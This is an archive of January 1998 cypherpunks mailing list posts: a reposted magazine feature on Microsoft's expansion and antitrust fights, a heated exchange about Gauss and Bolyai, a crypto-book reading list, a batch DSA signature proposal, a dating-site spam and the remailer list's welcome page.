         LOCAL UPRISING. The prospect of Microsoft entering everything from
         travel to car sales has put competitors on alert. Indeed, even a rumor of
         Microsoft's imminent arrival can jolt formerly complacent industries into
         action. Take newspaper publishers. Last year, when Microsoft
         announced it would launch Sidewalk, a series of Web sites offering
         local-entertainment listings, newspaper publishers geared up to protect
         their $24 billion in annual local advertising. Some 136 newspapers
         signed up with Zip2 Corp., a Mountain View (Calif.) supplier of online
         publishing technology that helps publishers create electronic versions
         of their newspapers. ''Microsoft tries to scare people into giving up, but
         it's just not working,'' says Zip2 CEO Rich Sorkin, who claims that his
         combined newspaper sites are racking up 8 million viewers a
         month--nearly triple the traffic Microsoft's 10 Sidewalk sites are
         drawing.

         So are critics' fears founded? Gates claims Microsoft has no grand
         plan to control the Net. What's more, not all of his Web ventures have
         been hits. Microsoft Network, the company's online service, has failed
         to live up to its early hype.

         LONG-TERM VIEW. While some of these new business are starting to
         pay off, Microsoft views the estimated $250 million a year it spends on
         Web sites as an investment in the future. ''Anybody involved in this is
         projecting out 5 to 10 years and asking what can they start to build now
         that can become more valuable as the Internet becomes more
         mainstream,'' says Gates.

         For that reason, Microsoft's biggest Web opportunity may lie in doing
         what it does best--creating software for others to use and build upon. It
         has begun selling its online travel software to airlines, including
         Northwest Airlines Corp. and Continental Airlines Inc. And American
         Express Co. is selling travel services to corporations based on
         Microsoft software called Microsoft Travel Technologies. ''They paid us
         quite a bit for that,'' says Gates. The potential looks huge: American
         Express Interactive is being rolled out in 20 large corporations,
         including Monsanto and Chrysler. An additional 180 companies will be
         using it by the end of 1998. All told, these companies represent more
         than $5 billion in yearly travel purchases, according to Microsoft's
         Richard Barton, general manager of Expedia.

         Still, it is unlikely that Microsoft will dominate the Web the way it has PC
         software. For one, it must compete against the giants in their fields, be
         they bankers, stock brokerages, real estate empires, auto makers, or
         travel agents. And the Web is still a work in progress, with new sites
         and opportunities popping up every day. Even with Windows as a
         starting point for most computer users, ''everything else is just a click
         away,'' says Bill Bass, a new-media analyst for Forrester Research.

         For his part, Gates doesn't show any willingness to let up to placate his
         critics or government investigators. And there's no sign in Redmond of
         complacency. In fact, Gates sees threats all around--even from
         operating systems that few people have ever heard of and Web sites
         that haven't been created yet. The key for Microsoft, he says, is
         satisfying customers, innovating, and keeping prices low. ''If we don't
         do all of these things,'' says its 43-year-old chairman, ''Microsoft will be
         replaced.''

         It's that sort of paranoia that has enabled Mircosoft to survive and thrive.
         It's possible, of course, that competitors will blunt his new attack in at
         least some areas. But unless the government succeeds in a full-scale
         antitrust assault, Bill Gates and Microsoft are destined to become a still
         more potent force in the world's most important industry.

         By Steve Hamm in Redmond, Wash., with Amy Cortese in New York
         and Susan B. Garland in Washington, D.C. 








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@anon.efga.org>
Date: Sat, 10 Jan 1998 07:57:39 +0800
To: cypherpunks@toad.com
Subject: Microsoft's Future
Message-ID: <8bd5d769a398c8464c62c1ebd07d42ed@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain



                       MICROSOFT'S
                          FUTURE

          A band of powerful foes is determined to slow
            the Gates juggernaut, but Microsoft's reach
           already extends further than you may think 

         In December, Samuel Goodhope stood hunched over an Austin
         conference-room table eyeing a dismembered personal computer. As
         a special assistant in the Texas Attorney General's office and point
         man in its antitrust investigation into Microsoft Corp., he needed a keen
         understanding of a PC's innards. So a technician painstakingly
         explained how each of the components is supplied by a different
         company, but they must all work with the critical Windows operating
         system made by a single corporation, Microsoft. That's when it hit him:
         Microsoft owns a key monopoly in the Digital Age, and the software
         maker is a lot like the Borg. These fictional Star Trek characters--part
         flesh, part machine--prowl the universe conquering other races.
         ''Resistance is futile,'' says Goodhope in a mechanical, Borg-like voice.
         ''You will be assimilated.''

         Microsoft and its hypercompetitive chairman, William H. Gates III, are
         no science-fiction fantasy. And the Texas Attorney General's office fully
         intends to resist. Indeed, Goodhope predicts that two dozen states will
         soon join his effort--amassing some 100 attorneys for a Big
         Tobacco-style courtroom battle that he says could reshape the
         computing landscape. ''We're talking about what the high-tech world is
         going to look like in five years,'' says Goodhope. ''Will the Information
         Superhighway become the Bill Gates toll road?''

         Microphobia, a national pastime in recent years, is reaching a new
         frenzy. Since October, the most influential company in the $700 billion
         U.S. computer industry has been under siege from all quarters. Texas
         and eight other states have launched investigations into whether the
         software giant is using anticompetitive tactics. Consumer advocate
         Ralph Nader is calling for a breakup of the company. The European
         Commission is mulling a probe of its own. And Microsoft is embroiled
         in a knock-down, drag-out fight with the Justice Dept. over whether it is
         violating a 1995 consent decree by requiring PC makers to ship its
         Internet browser with Windows 95. ''This kind of product-forcing is an
         abuse of monopoly power--and we will seek to put an end to it,'' vows
         Joel I. Klein, Assistant Attorney General for the Antitrust Div.

         For his part, Gates denies violating any laws and says the earlier
         consent decree with Justice allows Microsoft to enhance Windows.
         Browsing, he says, is a natural addition to an operating system. ''What
         we're doing is quite straightforward and quite pro-customer,'' Gates
         says. ''In no way are we eliminating choice.'' He also bristles at the
         notion that Microsoft wants to turn the Internet into its personal toll road.
         ''We'll get our revenue from selling great software.''

         Microsoft's dispute with the Justice Dept. is no mere joust over the
         mechanics of linking a Web browser to the ubiquitous Windows 95.
         The passions aroused in the government and industry alike reflect the
         realization that this is a bruising fight over which companies will
         dominate the Internet and move into new markets from there. The prize
         is huge. The Net not only opens the possibility of a vast new
         marketplace for everything from banking to buying cars, but it is also
         the electronic gateway into homes and--perhaps more important--into
         corporations. Owning the browser and Internet server software could
         well become as key to the new age of Net computing as Windows is to
         PCs.

         If Gates extends his PC hegemony to these new realms, the little
         software company he co-founded in 1975 could come to dominate the
         nexus of computing and communications well into the 21st century.
         ''The question is, are we looking forward to the Information Age, or will it
         be the Microsoft Age?'' asks Lawrence J. Ellison, chairman of
         database maker Oracle Corp. ''It's kind of like Microsoft vs.
         mankind--and mankind is the underdog.''

         A BROADER CASE? Hyperbole aside, Microsoft wants to move into
         every business where software matters--from the chilled rooms of
         mainframe computing to the household appliances that are being
         computerized. Gates wants to expand into the corporate-enterprise
         market--from databases to E-mail. And he wants to play in consumer
         electronics--from TV set-top boxes to car navigation systems.

         Rivals and critics hope the Justice Dept. can slow down Microsoft's
         pace. The current dispute, which centers on Windows 95, is likely to
         have little effect on Microsoft. But if Justic broadens its suit to cover the
         upcoming Windows 98--something it has hinted it might do--or attacks
         Windows NT as well, Microsoft would suffer a devastating blow.
         ''Unless we're allowed to enhance Windows, I don't know how to do my
         job,'' says Gates. It would also set an ominous precedent that cuts to
         the heart of the software maker's strategy of melding Internet
         capabilities into all of its products--from PC software to new
         consumer-electronics offerings to corporate enterprise programs.

         It could get worse for Gates. No matter how the current dispute is
         resolved, Klein and his team could bring a broader antitrust case.
         Caswell O. Hobbs, a Washington (D.C.) antitrust attorney with Morgan,
         Lewis & Bockius, says the current consent violation case is just ''an
         opening salvo. I'm sure it's not the last of the proceedings.''

         In its thinking on Microsoft, Justice is relying on a novel theory in
         antitrust law. It's not only about monopoly pricing power, as in the days
         of the Robber Barons. Information technology, after all, is an industry in
         which prices fall. Rather, Justice is concerned that Microsoft's
         operating system is so dominant that it is the de facto standard, the
         very springboard for all sorts of new applications software. By
         controlling the standard, Justice fears, Microsoft stifles innovation. That
         means competing technologies, even if they're better, stand little
         chance, making it tough for startups to bring whizzy new inventions to
         market. ''They're hell-bent on dominating the entire information
         infrastructure of the world,'' says attorney Gary Reback, who represents
         rival Netscape Communications Corp., ''and it scares the daylights out
         of me.''

         Such talk rankles Gates. He says his rivals should spend less time
         obsessing about Microsoft and more time on their own businesses.
         What's more, he argues, there's no assurance Microsoft will succeed in
         any new markets, much less dominate them. The emergence of
         Netscape's popular Navigator browser and Sun Microsystems Inc.'s
         Java programming language--threats to Windows, as he sees it--shows
         that the industry is highly competitive. ''No one has a guaranteed
         position,'' says Gates.

         Point taken. But if ever there was a company that has the best seat in
         the house, it's Microsoft. It practically owns the PC software market. Its
         Windows operating system claims some 86% of that segment, and its
         Office suite of productivity programs, including a spreadsheet and word
         processor, has an 87% lock. Game won--and the victor has emerged
         enormously wealthy. Microsoft is expected to reel in more than $4
         billion in profits this fiscal year, which ends in June, on $14 billion in
         revenues, up 23% over a year ago. It looks even richer when compared
         with the rest of the software industry: In calendar year 1996, its $8.7
         billion in revenues accounted for 10% of all sales for the 613 publicly
         traded software and information-services companies, says Standard &
         Poor's Compustat. More significantly, its $3.1 billion in operating profits
         was a remarkable 30% of all such profits.

         With the company's pockets lined with riches from Windows and
         related software, it can spend a staggering $2.5 billion a year on
         new-product development--more than the annual profits of the next 10
         largest software companies combined. And what it can't develop fast
         enough, the company can buy. In the past two years, Microsoft has
         invested in or acquired 37 companies. On Dec. 31, it added Hotmail,
         an Internet E-mail startup founded by Sabeer Bhatia and Jack Smith,
         for an estimated $350 million in stock (page 37). It has snapped up
         technologies for surfing the Web via TV, for viewing video over the Net,
         for authoring Web pages, and for computers to understand voice
         commands. And still its cash hoard keeps climbing--from $6.9 billion in
         mid-1996 to $10 billion today.

         That has helped Microsoft extend its reach to brand-new terrain. In the
         past year, Microsoft has gotten a jump in online travel services, car
         sales, investment advice, and gaming. And Gates isn't shy about his
         ambitions. ''We will not stop enhancing Windows,'' he says. ''We will not
         succumb to the rhetoric of our competitors. We won't stop listening to
         customers and being aggressive about meeting their needs.''

         Indeed, 1998 may be the year Gates makes his biggest push yet
         beyond the PC. Starting this month, planned new products will move
         Windows into car dashboards, cell phones, point-of-sale devices, and
         on up the food chain into powerful server computers that can do the job
         of a mainframe. In short, the world ain't seen nothin' yet. Here's where
         Microsoft is headed.

         CONSUMER ELECTRONICS
         On Jan. 10, the next chapter unfolds. That's when Gates will head to the
         Consumer Electronics Show in Las Vegas to demonstrate new
         $300-to-$500 palm-size devices that use a pint-size version of
         Windows called CE, for consumer electronics. These gizmos go a long
         way toward fulfilling Gates's dream of a ''wallet PC''--a tiny device for
         keeping phone numbers, schedules, and zapping E-mail, all of which
         can be synchronized with Windows PCs. A half-dozen manufacturers
         are ready to ship the new palmtops, including Philips Electronics and
         Samsung Co.

         The real buzz at the electronics show could come from the debut of
         Microsoft's ''Auto PC'' operating system. This version of Windows CE
         is built into a car's sound system. It can handle cell-phone calls, fetch
         E-mail, and dispense travel information--much like a ''Java car''
         unveiled by rivals Sun, Netscape, and IBM in November. Nissan Motor
         Co. will be the first to show Auto PC in an Infinity I-30 concept car. So
         far only a handful of carmakers, including Volkswagen and Hyundai,
         have signed up. Microsoft is betting that aftermarket car-component
         companies will make Auto PC a hit. ''Windows CE gives us an
         opportunity to sell more software to more people,'' says Kathryn Hinsch,
         senior director of marketing for Windows CE. ''This could be the next
         billion-dollar business for Microsoft.''

         Windows CE is a classic example of how Microsoft stubbornly pushes
         its way into new fields, even if it takes years. CE is the software giant's
         third attempt to crack the handheld market--after its At Work and
         Winpad operating systems that never caught on. Microsoft didn't give
         up. Over the past seven years, it has continued to invest several
         hundred million dollars to improve the basic software. CE was launched
         in fall, 1996, and nine months later claimed 20% of the handheld
         market, according to market researcher Dataquest Inc.

         Today, CE is licensed by more than a dozen handheld manufacturers,
         and it's finding its way into all manner of machines. Atlanta-based
         Radiant Systems Inc., for example, plans to sell Windows CE
         point-of-sale devices to fast-food restaurants this winter. Customers
         press buttons on a screen to select the food and drinks they want--and
         orders are instantly whisked to the kitchen. Such devices could help
         boost Windows CE to 60% of the U.S. handheld market this year, says
         International Data Corp.

         What happens when even the try, try again approach fails? Consider
         Microsoft's attempts to corral the TV set-top box market--the fulcrum for
         software, entertainment, and Net cruising. In 1994, it debuted a scheme
         for digital set-top boxes, but it fizzled along with the market for
         interactive TVs.

         So Microsoft tried a different method: acquiring the leading business.
         Last winter, Microsoft spent $425 million to buy Silicon Valley startup
         WebTV, which had pioneering technology for surfing the Net via TV.
         Since then, Microsoft has improved WebTV with a faster setup and,
         during the holiday shopping season, an added carrot--a $100 rebate to
         anyone who bought a $279 WebTV device and signed up for six
         months of the $19.95-a-month service. The result: WebTV has racked
         up 250,000 subscribers, up from 50,000 a year ago, say WebTV
         executives.

         Still, the world of TV is proving tricky for Microsoft. Last spring, the
         software maker once again began stumping to sell its designs to the
         nation's cable-TV operators for their next-generation interactive
         systems. The pitch: Microsoft would provide software for set-top boxes,
         networks, and servers that pump info across the cable network. When
         Microsoft paid $1 billion in June for a piece of cable operator Comcast,
         it looked as though it might buy its way into becoming a top supplier of
         software for interactive-cable systems. But no such luck--at least, not
         yet. In October, the cable industry announced it would require all
         suppliers to comply with a set of industry-standard specifications--not
         necessarily those of Microsoft.

         Gates regrouped. Microsoft revised its pitch to cable
         operators--agreeing to comply with the specs and to sell pieces of its
         software a la carte. It's unclear how Microsoft will fare, but one thing is
         certain: Cable execs have seen how successful Microsoft is in PCs and
         are determined not to let it control a key piece of cable-network
         technology. ''We don't want to be Bill Gates's download,'' says
         Tele-Communications Inc. President Leo J. Hinderly Jr. Still, rumors are
         swirling that TCI is about to accept financing from Microsoft--which
         could turn it into an ally overnight.

         CORPORATE COMPUTING
         Microsoft's high-stakes bid for the $30 billion corporate market has
         never looked so good. Four years ago, it was nearly a no-show in
         so-called ''enterprise'' software, which spans databases to E-mail to
         powerful servers. After a dogged three years and $1 billion spent
         beefing up its industrial-strength Windows NT, Microsoft is gaining
         ground. Today, NT accounts for nearly 40% of server operating
         systems, up from 24.5% a year ago, says IDC.

         That share could take off even more when Microsoft ships its fifth and
         most powerful version of NT late this year. With some 27 million lines of
         code, it is the most ambitious program Microsoft has ever tackled--and
         it could prove to be its trump card. NT 5.0 is designed to handle the
         largest computing tasks, giving Microsoft a sorely needed piece to
         push beyond midsize networks and small server jobs. Says James E.
         Allchin, Microsoft senior vice-president of Personal & Business
         Systems: ''Microsoft is betting the company on this.''








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 10 Jan 1998 09:31:08 +0800
To: cypherpunks@toad.com
Subject: Re: In God We Antitrust, from the Netly News
In-Reply-To: <v03102800b0dc2d3e93db@[207.167.93.63]>
Message-ID: <55e3ie25w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Tim May <tcmay@got.net> writes:
> AMD is now trading at $18. Five years ago it was trading at the same price.
> In fact, it's been a narrow range between about 20 and 30 for most of that
> time, briefly blipping up to 40 before dropping back to the level it was
> half a decade ago. In fact, it's where it was in 1983, 15 years ago. (Check
> the charts.)
>
> Meanwhile, Intel has moved from $15 to $72 (today's price) in 5 years, and
> from something like $2 (or less, as the charts don't go back to '83 for
> Intel), up a factor of 30 or more times.

This is not the way to compare 2 stocks. Let me illustrate this with
a numericl example.

Stock A has been trading at about $10 for the last 10 years.  Every year
it paid $5 in dividends. (OK, so why is it to fucking cheap)

Stock B has appreciated from $10 to $20 over the last 10 years.

Which has better total returns?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 10 Jan 1998 09:32:13 +0800
To: cypherpunks@toad.com
Subject: Re: rant on the morality of confidentiality (fwd)
In-Reply-To: <199801091729.LAA09084@einstein.ssz.com>
Message-ID: <17F3ie27w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate <ravage@ssz.com> writes:

> > From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
>
> > I'm sorry, I don't have the time to look this up. If you're trying to prove
> > that Gauss was not a nice person, I don't believe it.
>
> Anyone who would tell their dying wife, via their son, to wait a moment
> until he had finished his calculations is not a nice person.

Do you have proof that Gauss did that?  This sounds like another one of
those urban legends the envious sheeple like to invent about celebrities,
like the claim that Leonrado da Vinci was a cocksucker.

> > argument you can make is to cite Bolyai's claims that Lobachevsky was not
> > a real person but a "tentacle" of Gauss, created to persecute Bolyai
> > (gee, that sounds vaguely familiar...), and you can't find any more dirt
> > on Gauss, then it proves to me that he was indeed a remarkably nice person.
>
> What the hell are you talking about here? I made no such claims at all.

You're citing janos Bolyai, who claimed exactly that.  Unfortunately, the
poor chap went insane.

> > You also haven't explained how Bolyai could have been Gauss's school friend
> > being 25 years younger.
>
> Bolyai's father worked with Gauss (as I explained) and his son John also
> worked with Gauss from the time he (Bolyai) was in school; not Gauss.

You're confused, Jim.  Farkas Bolyai (the father) never claimed to have
invented non-euclidean geometry. He published a math textbook in 1829,
with an appendix credited to his son, Janos, which contained the results
published by Lobachevsky in 1829.  He's lucky we're not accusing him
of plagiarism.

> I am going to refrain from going on with the remainder of your 'points'.

Because if you tried to do that, you would again expose your ignorance,
as you did when you tried arguing about Soviet-Japanese skirmishes in the
1930s.

Coward.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 10 Jan 1998 09:31:07 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Cracking a program (fwd)
Message-ID: <199801100152.TAA11108@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: "Ching Yen Choon" <ycching@unitele.com.my>
> Subject: Cracking a program
> Date: Sat, 10 Jan 1998 08:46:24 +0800

> Let's say I have this encryption program and I don't know what's the
> algorithm used in it. Is there a technique I can analyse and break it? Are
> there any books or sites which teaches us how to do it?

Applied Cryptography: Protocols, Algorithms, and Source Code in C
Bruce Schneier
ISBN 0-471-11709-9
$49.95 US

Internet Cryptography
Richard E. Smith
ISBN 0-201-92480-3
~$40.00 US

Disappearing Cryptography
Peter Wayner
ISBN 0-12-738671-8
$29.95 US

Decrypted Secrets: Methods and Maxims of Cryptology
F.L. Bauer
ISBN 3-540-60418-9
$39.95 US


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jewish Personals <info@jewishpersonals.com>
Date: Sat, 10 Jan 1998 10:07:29 +0800
To: cypherpunks@toad.com
Subject: Reminder
Message-ID: <199801100143.RAA10447@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear Friend,

At JewishPersonals, (http://www.JewishPersonals.com), we are dedicated to
bringing Jewish Singles together. JewishPersonals is here to find your
love, friendship or just e-mail buddies. Our site features, anonymous
email, contests, bookstore, chat rooms and the unique Personal Agent
feature which notify you automatically of any potential match according to
your selection criteria. 

Come and join over 7,000 active members with pictures from around the world
with a majority from North America.

We invite you to visit our site and join us - It is fun, easy, FREE and it
WORKS!

Don't forget to tell your friends about http://www.JewishPersonals.com -- 


Sincerely, 
Deborah Moss (mailto:info@JewishPersonals.com)
19 W. 44 St., NY, NY 10036, 212 302 3366. Fax: 212 730 1681


Sign for your FREE* copy of Jewish Ink delivered to your door, the only
Jewish Internet magazine and more from JCN --
http://www.jewishink.com/register.asp

The JewishGuide to New York is open! http://www.jewishguide.com - more
cities to follow.

All services are provided by Jewish Communication Network, the premier
Jewish Internet Company visits us at http://www.jcn18.com


This e-mail was sent using an evaluation copy of dbMail by Mach5 Software.
You can download a copy from http://www.mach5.com/.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 10 Jan 1998 09:39:07 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Germany not so worried about Gestapo wiretaps now
Message-ID: <1.5.4.32.19980110013045.006e9b2c@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Tim May wrote:

>(Things have been quiet on the crypto legislation/international agreements
>front, from a news point of view, but we can safely assume that all of
>these bad things are moving along behind the scenes, and will once again
>become cause celebres.)

A clue to what's coming: BXA is due to issue its regulations for
implementing the Wassenaar Arrangement about January 26, so wrote
Jim Lewis at the agency. (Most here know that Wassenaar is
an international agreement among thirty-plus nations to control
export of technology, including encryption.)

Other nations who have signed Wassenaar will probably follow suit, 
preceded already by Australia and maybe others. Scuttlebutt is that
they're awaiting the US giant's move (or dealing for better incentives).

Further, there's surely preparatory work going on for crypto legislation
in the upcoming session, and we may see a push early in the term
in concert with Wassenaar and perhaps other Net regulations stimulated
by fear of infrastructure terrorism.

What's worth pondering is what new arguments will be made for
controlling/decontrolling crypto, new ways to divide the baby 
so every interest group can have a chunk, new serendipitous 
incidents, accidents and incentives.

Recall Bill Renisch's comment that nothing has ever boosted
interest in BXA-who like encryption, as several legislators and
other who's-thats in and out of gov have discovered. Any
topic that generates public attention is not to be ignored for long.

Along parallel lines, The New Yorker mag of January 12 has two
stories of note:

A short one on how blame the militants for the OKC bombing
so powerfully argued before the trials of McVeigh and Nichols
was not pursured during the trials. It suggests an apology to
militants is in order for groundless accusations.

Another much longer on the economic theory behind Justice's 
attack on Microsoft and how it challenges free market theory,
especially for high technology. That government intervention
may be needed for the pervasive dependency of society on 
such technology because it has such vast potential for harm. 
A curious parallel to the argument for Wassenaar.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@REPLAY.COM>
Date: Sat, 10 Jan 1998 03:51:57 +0800
To: coderpunks@toad.com
Subject: Batch DSA
Message-ID: <199801091935.UAA03400@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Batch DSA

Amos Fiat invented a way to do multiple RSA signatures using only one
full-sized exponentiation [J Cryptology v10 n2 p75].  The trick is to
sign each one with a different RSA key, where the keys all share the
same modulus n but differ in their public exponents e.

A similar technique allows DSA signatures to be batched.  As with
Batch RSA, each message ends up being signed with a different DSA key,
where the keys share the same p, q, and g values, but differ in their
public y values, where y = g^x mod p for a secret x.

These techniques may be useful for situations where heavily loaded servers
need to digitally sign many responses.

A DSA signature on a message M (where M is the hash of the actual data)
is done as follows:

	Choose a random value k.  k must be different for every signature.
	Calculate R = g^k mod p mod q.
	Calculate S from S*k = M + R*x mod q.

Then (R, S) is the signature.

The time consuming part of this is the calculation of g^k.  This is the
only exponentiation which must be done.  All the other calculations can
be very fast.

We can't re-use a k value because it allows x to be discovered very
easily.  If two signatures (R, S_1) and (R, S_2) use the same k value,
we have (mod q):

	S_1*k = M_1 + R*x
	S_2*k = M_2 + R*x

The capitalized values are known, the lower case k and x are the unknowns.
We have two equations in two unknowns, which allows us to recover k and x.

If different x values are used for each signature, then it should be safe
to re-use k.  This is how Batch DSA would work.

The signer would publish his public key as p, q, and g as usual, but now
he would publish multiple y_i = g^x_i values.  The convention is that
any message is considered signed by the key if it is signed by any of the
y_i.

To sign a batch of messages, one k value is used for all of them.  The
same calculation as above is used:

	R = g^k mod p mod q  (same for all)
	S_i * k = M_i + R * x_i mod q

The signature is (R, S_i, i), where the index i is included to tell the
verifier which y_i to use.

This is not vulnerable to the problem above of re-using k.  The multiple
signatures have the relationships:

	S_1*k = M_1 + R*x_1
	S_2*k = M_2 + R*x_2
	S_3*k = M_3 + R*x_3
	...

We always have more unknowns than there are equations, which hides the
values of k and x_i.

This same technique can be applied to most other discrete log signatures,
which generally have the same structure although they differ in the details
of how x and k are used to construct R and S.

With Batch RSA, there is a tradeoff between batch size and efficiency.
The calculations become inefficient for batch sizes larger than tens
of messages when keys are about 1K bits.

Batch DSA can efficiently handle larger batches, but it has a tradeoff
between batch size and key size.  Each key variant requires specifying a
full-sized y value, while with Batch RSA the variants just required
listing a small e value (and possibly not even that, if the exponents
are the small primes).  This will limit Batch DSA in most circumstances
to similar batch sizes of on the order of tens of messages, otherwise
the keys become unreasonably large.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 10 Jan 1998 10:16:02 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: rant on the morality of confidentiality (fwd)
Message-ID: <199801100237.UAA11439@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Ok, my absolutely last post on this issue.

Forwarded message:

> Subject: Re: rant on the morality of confidentiality (fwd)
> From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
> Date: Fri, 09 Jan 98 19:50:35 EST

> > Anyone who would tell their dying wife, via their son, to wait a moment
> > until he had finished his calculations is not a nice person.
> 
> Do you have proof that Gauss did that?  This sounds like another one of
> those urban legends the envious sheeple like to invent about celebrities,
> like the claim that Leonrado da Vinci was a cocksucker.

It is a commen citation in several of his biographies. The first place I saw
it was in a science history book that Isaac Asimov wrote (you know who he is
I assume, known for writing world-class sci-fi and one of the best
bio-chemistry textbooks around in the 70's and early 80's) back in the late
70's. It's the same book where he talks about Torricelli (he invented the
mercurey barometer) and how he sent his brother-in-law into the bandit
infested hills to actualy test the device. There seems to have been some
indication that Torricelli had an alterior motive in this action.
Unfortunately I think I have attempted to read a large fraction of the 300+
books that Asimov wrote at one time or another since about 1965 when I really
started to read sci-fi and as a result they all seem to run together. I
looked in the couple of Asimov books that I actualy own but unfortunately it
isn't in either of them. I will look at the library I keep at the shop next 
time I go out there but it is equaly likely it was destroyed in my house fire
3+ years ago. If somebody out there knows which book this is I would appreciate
the citation. I will add this to my 'hunt-list' that I keep as I tour the many
bookstores here in Austin. If I find it I'll holler.

> > > argument you can make is to cite Bolyai's claims that Lobachevsky was not
> > > a real person but a "tentacle" of Gauss, created to persecute Bolyai
> > > (gee, that sounds vaguely familiar...), and you can't find any more dirt
> > > on Gauss, then it proves to me that he was indeed a remarkably nice person.
> >
> > What the hell are you talking about here? I made no such claims at all.
> 
> You're citing janos Bolyai, who claimed exactly that.  Unfortunately, the
> poor chap went insane.

No, I am citing the translator of Bolyai's book; Dr. George Bruce Halsted.
If you want to discuss this further and intelligently it might do you well to
have actualy read the book, which by your own admission you never have.
Don't be a miser, spend the $6.00 US.

I *might* take your comments a hell of a lot more seriously if just once you
would cite a single reference to *any* of your comments or claims. It is
interesting that when it comes down to proof you don't have the time to do
the research nor do you *ever* fill any request for references.

> You're confused, Jim.  Farkas Bolyai (the father) never claimed to have
> invented non-euclidean geometry.

Your twisting words and dangerously approaching straight out lying. Both
Farkas Bolyai and Gauss worked together on non-euclidian geometry. Let me
quote the translators notes for the book:

" But to prove Euclid's system, we must show that a triangle's angle-sum is
exactly a straight angle, which nothing human can ever do.
  However, this is anticipating, for in 1799 it seems that the mind of the
elder Bolyai, Bolyai Farkas, was in precisely the same state as that of his
friend Gauss. Both were intensely trying to prove what now we know is
indemonstable. ..."

As to my making mistakes, big fucking deal. Everyone does. The difference
between you and me is that I am not trying to do anything other than figure
out what happened and why. If I'm wrong I'll admit it (and I am at least
once a day). I am also willing to do the research (as best I can with what
resources I have) and also willing to cite it. All I ask from those who wish
to debate issues with me is equal treatment, in short the opportunity to
review their sources and an honest opportunity to refute those sources. You
seem to have a personal motive in everything you submit and further *never*
cite any sort of source that can be reviewed and repudiated or supported.

To put it bluntly, you lack honesty in your dealings with others.


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 10 Jan 1998 10:32:42 +0800
To: cypherpunks@ssz.com
Subject: index.html
Message-ID: <199801100253.UAA11537@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text/plain




Welcome to the Cypherpunks Distributed Remailer.

The purpose of this mailing list is to explore the frontier of cryptography,
civil liberty, economics, and related issues.

This is a very high traffic mailing list.

Several members of the mailing list are involved in various types of events
through the year. Participation by members of the list does not construe any
support or affilliation with the mailing list. Contact the author of all
works obtained through the remailer network. They retain original rights.

There are currently 4 indipendant but cooperating sites supporting full
cross posting of traffic. The goal is to provide a mechanism for improved
list stability as well as making moderation and other forms of attacks
harder to mount. These sites are:

ssz.com
algebra.com
cyberpass.net
htp.com (Japan)

If you have specific questions about the list or particular remailer host
sites please contact postmaster@domain_name for further information. Should
you be interested in participating as a CDR host then make an announcement
on the list. This will allow all the sites to update their maps. All that is
required to become a member is some form of remailer or forwarding mechanism
and a means to delete multiple copies of the same message. Currently there
are several remailer programs but majordomo is the most popular. In general
a procmail script is used to remove duplicates.

Please let others know about this mailing list, the more the merrier!

To subscribe to the CDR you should contact the individual operators as
conditions at each remailer site may be quite different. To subscribe
through SSZ you should send a note to list@ssz.com or send an email to
majordomo@ssz.com with 'subscribe cypherpunks email_address' in the body.
If you have questions or problems contact list@ssz.com

There may be local groups of members who have regular (or not) meetings
in order to discuss the various issues and projects appropriate to their
individual membership. These groups generaly announce their meetings via the
CDR. Please feel free to make appropriate announcements of activity in your
area.

Some popular books that are well respected for learning about Cryptography
and the various issues are:

Applied Cryptography: Protocols, Algorithms, and Source Code in C
